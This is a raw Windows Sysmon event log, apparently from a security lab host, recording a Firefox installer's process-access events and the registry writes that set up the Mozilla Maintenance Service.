13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 13241300x800000000000000016302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\PathC:\Program Files\Mozilla Firefox 13241300x800000000000000016301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\(Default)C:\Program Files\Mozilla Firefox\firefox.exe 13241300x800000000000000016300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-PubSetValue2021-01-18 
13:59:53.239{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\PublisherMozilla 11241100x800000000000000016299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:53.239{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeC:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe2021-01-18 13:59:53.239 13241300x800000000000000016298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\DescriptionDer Mozilla Maintenance Service stellt sicher, dass die neueste und sicherste Version von Mozilla Firefox auf Ihrem Computer installiert ist. Denn Firefox auf dem aktuellen Stand zu halten, ist sehr wichtig für Ihre Sicherheit online und Mozilla empfiehlt mit Nachdruck, dass Sie den Dienst aktiviert lassen. 
13241300x800000000000000016297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\Security\SecurityBinary Data 13241300x800000000000000016296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\ObjectNameLocalSystem 13241300x800000000000000016295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\DisplayNameMozilla Maintenance Service 13241300x800000000000000016294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\ImagePath"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" 13241300x800000000000000016293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\ErrorControlDWORD (0x00000001) 13241300x800000000000000016292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\StartDWORD (0x00000003) 13241300x800000000000000016291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
